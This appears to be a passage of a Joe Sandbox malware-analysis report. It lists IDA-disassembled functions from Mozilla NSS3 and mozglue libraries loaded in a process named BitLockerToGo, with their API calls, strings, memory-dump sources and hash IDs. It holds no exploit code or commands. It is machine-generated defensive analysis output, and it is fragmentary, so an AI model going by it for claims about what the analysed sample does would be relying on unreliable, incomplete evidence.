                                                                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                    • API String ID: 491875419-598938438
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0abc9e8e77749007bb729db272402f8fcf398cfc80839b2f5730a7ed8e310b06
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b3624bc258817c8b3837b2bbb29da64c78ed67fecf6039c7c8cce505250f9430
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0abc9e8e77749007bb729db272402f8fcf398cfc80839b2f5730a7ed8e310b06
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40612871A042508BD310CF29C941BA6B7F5EF55318F2881ADE4499FF42D376D987C7A1
                                                                                                                                                                                                                                                                                                                    Function 6CADCC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,00000100,?), ref: 6CADCD08
                                                                                                                                                                                                                                                                                                                    • PK11_DoesMechanism.NSS3(?,?), ref: 6CADCE16
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(00000000,00000000), ref: 6CADD079
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB3C2BF
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1351604052-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: d693ea3b7318b9005bdc905a79cb3036100b8ee1cc567dd016f07837cb281d26
                                                                                                                                                                                                                                                                                                                    • Instruction ID: a40a22817ff70e4b16ecf29c9cd0b71bb5122a8ce337f100eb80d4fd6baf3428
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d693ea3b7318b9005bdc905a79cb3036100b8ee1cc567dd016f07837cb281d26
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7BC18DB1E002199BDB10CF24CC80BDAB7B4BB48308F5941A8E949A7741E775EED9CF90
                                                                                                                                                                                                                                                                                                                    Function 6CA92C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PORT_ZAlloc_Util.NSS3(37A40486), ref: 6CA92C5D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0D30: calloc.MOZGLUE ref: 6CAF0D50
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0D30: TlsGetValue.KERNEL32 ref: 6CAF0D6D
                                                                                                                                                                                                                                                                                                                    • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CA92C8D
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA92CE0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CA92CDA,?,00000000), ref: 6CA92E1E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CA92E33
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92E00: TlsGetValue.KERNEL32 ref: 6CA92E4E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92E00: EnterCriticalSection.KERNEL32(?), ref: 6CA92E5E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92E00: PL_HashTableLookup.NSS3(?), ref: 6CA92E71
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92E00: PL_HashTableRemove.NSS3(?), ref: 6CA92E84
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CA92E96
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92E00: PR_Unlock.NSS3 ref: 6CA92EA9
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA92D23
                                                                                                                                                                                                                                                                                                                    • CERT_IsCACert.NSS3(00000001,00000000), ref: 6CA92D30
                                                                                                                                                                                                                                                                                                                    • CERT_MakeCANickname.NSS3(00000001), ref: 6CA92D3F
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CA92D73
                                                                                                                                                                                                                                                                                                                    • CERT_DestroyCertificate.NSS3(?), ref: 6CA92DB8
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE ref: 6CA92DC8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA93E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA93EC2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA93E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CA93ED6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA93E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA93EEE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA93E60: PR_CallOnce.NSS3(6CBF2AA4,6CAF12D0), ref: 6CA93F02
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA93E60: PL_FreeArenaPool.NSS3 ref: 6CA93F14
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA93E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA93F27
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3941837925-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3c3d0e07a5e9a081932a15e31f967fce061379502bcf7d1b1d8e2125f10267e3
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b2b15484822969d8f070dfd9073801a14f9cf4573baa3c65fa2852ab80ea190f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c3d0e07a5e9a081932a15e31f967fce061379502bcf7d1b1d8e2125f10267e3
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF510075A143119FEB00DE29DC8AB5B77E5EF84348F18062CEC5987620E731E898CB92
                                                                                                                                                                                                                                                                                                                    Function 6C9CDDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C9CDDCF
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9AFA4B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9C90E0: free.MOZGLUE(?,00000000,?,?,6C9CDEDB), ref: 6C9C90FF
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9C90E0: free.MOZGLUE(?,00000000,?,?,6C9CDEDB), ref: 6C9C9108
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9CDE0D
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C9CDE41
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9CDE5F
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9CDEA3
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9CDEE9
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C9BDEFD,?,6C984A68), ref: 6C9CDF32
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9CDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C9CDB86
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9CDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C9CDC0E
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C9BDEFD,?,6C984A68), ref: 6C9CDF65
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C9CDF80
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C995EDB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: memset.VCRUNTIME140(6C9D7765,000000E5,55CCCCCC), ref: 6C995F27
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: LeaveCriticalSection.KERNEL32(?), ref: 6C995FB2
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 112305417-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: df6c06a99389f1644f29743a8a35065613889a053c81d61bb58bd14be7d1fa50
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1bd923fc703d784883359529fad034169505719e344e0caa413c644bdb0fe6f7
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df6c06a99389f1644f29743a8a35065613889a053c81d61bb58bd14be7d1fa50
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A51C3737456019BD7219B28D8806EFB3B6BFA1318F9A011CD85A53B00DB31F91ACB93
                                                                                                                                                                                                                                                                                                                    Function 6C9ACC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C9731A7), ref: 6C9ACDDD
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                                                    • API String ID: 4275171209-2186867486
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 79731a174bf88bb1efe4ef273d94373a2bd38ca5424b2c30c9b2060880105214
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 32bf53c81663cf94a488fc0215d41535638d393e2a23352e15188fdb58653a16
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79731a174bf88bb1efe4ef273d94373a2bd38ca5424b2c30c9b2060880105214
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D31CA707452055BFF10AFE58D45B6E7B79BB45B18F304018F524AFAC0DB72D9128BA1
                                                                                                                                                                                                                                                                                                                    Function 6CAF4DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CAF536F,00000022,?,?,00000000,?), ref: 6CAF4E70
                                                                                                                                                                                                                                                                                                                    • PORT_ZAlloc_Util.NSS3(00000000), ref: 6CAF4F28
                                                                                                                                                                                                                                                                                                                    • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CAF4F8E
                                                                                                                                                                                                                                                                                                                    • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CAF4FAE
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAF4FC8
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                                                                                                                                                                                                                    • String ID: %s=%c%s%c$%s=%s
                                                                                                                                                                                                                                                                                                                    • API String ID: 2709355791-2032576422
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 6b51b0feb658ee2776ea68f8b8103c73789fddde3fee6022521c6944fe23be4b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: eb4e34d0b89560aa584bb1bcd8cedf0fe9c18e9201b7e93b1a8aff155174dd02
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b51b0feb658ee2776ea68f8b8103c73789fddde3fee6022521c6944fe23be4b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26513631E442868BFB01CA69C6907FE7BF59F46748F1C8125F8B4A7A40D339888787A1
                                                                                                                                                                                                                                                                                                                    Function 6C97ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97F100: LoadLibraryW.KERNEL32(shell32,?,6C9ED020), ref: 6C97F122
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C97F132
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000012), ref: 6C97ED50
                                                                                                                                                                                                                                                                                                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C97EDAC
                                                                                                                                                                                                                                                                                                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C97EDCC
                                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32 ref: 6C97EE08
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C97EE27
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C97EE32
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C97EBB5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C9AD7F3), ref: 6C97EBC3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C9AD7F3), ref: 6C97EBD6
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C97EDC1
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                                                                                                                                                                                    • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                                                                                                                                                                                    • API String ID: 1980384892-344433685
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 84393c70f8bf6a939486ad056d95d08f6e43d697819cfe682b1ab5aa3f800a02
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 35e9695562c74eb83331751298012b3fe86b9d6c25bafd130b51d3e2e86f8142
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84393c70f8bf6a939486ad056d95d08f6e43d697819cfe682b1ab5aa3f800a02
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9351E071D06204DFDB21DF68D9416EEB7B4AF69318F04892DE8556B740E730E948C7B2
                                                                                                                                                                                                                                                                                                                    Function 6CAA8CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(00000000,00000000,?,6CAB124D,00000001), ref: 6CAA8D19
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,6CAB124D,00000001), ref: 6CAA8D32
                                                                                                                                                                                                                                                                                                                    • PL_ArenaRelease.NSS3(?,?,?,?,?,6CAB124D,00000001), ref: 6CAA8D73
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,6CAB124D,00000001), ref: 6CAA8D8C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DD70: TlsGetValue.KERNEL32 ref: 6CB3DD8C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB3DDB4
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,6CAB124D,00000001), ref: 6CAA8DBA
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                                                                                                                                                    • String ID: KRAM$KRAM
                                                                                                                                                                                                                                                                                                                    • API String ID: 2419422920-169145855
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ef4d4b2d997fdcef4d06756bbdb2b1db7d3bfe7367b2b70a074e9d515b4c0cfd
                                                                                                                                                                                                                                                                                                                    • Instruction ID: db6c2010631f3c9482132eaf53e4cee89de6791ad79f9f44610a021c7391b55e
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef4d4b2d997fdcef4d06756bbdb2b1db7d3bfe7367b2b70a074e9d515b4c0cfd
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1121A1B5A046418FCB40EFB8C58466EBBF0FF45308F19896AD89887701E731D896CB91
                                                                                                                                                                                                                                                                                                                    Function 6CBA0ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CBA0EE6
                                                                                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CBA0EFA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA8AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CA8AF0E
                                                                                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBA0F16
                                                                                                                                                                                                                                                                                                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBA0F1C
                                                                                                                                                                                                                                                                                                                    • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBA0F25
                                                                                                                                                                                                                                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBA0F2B
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
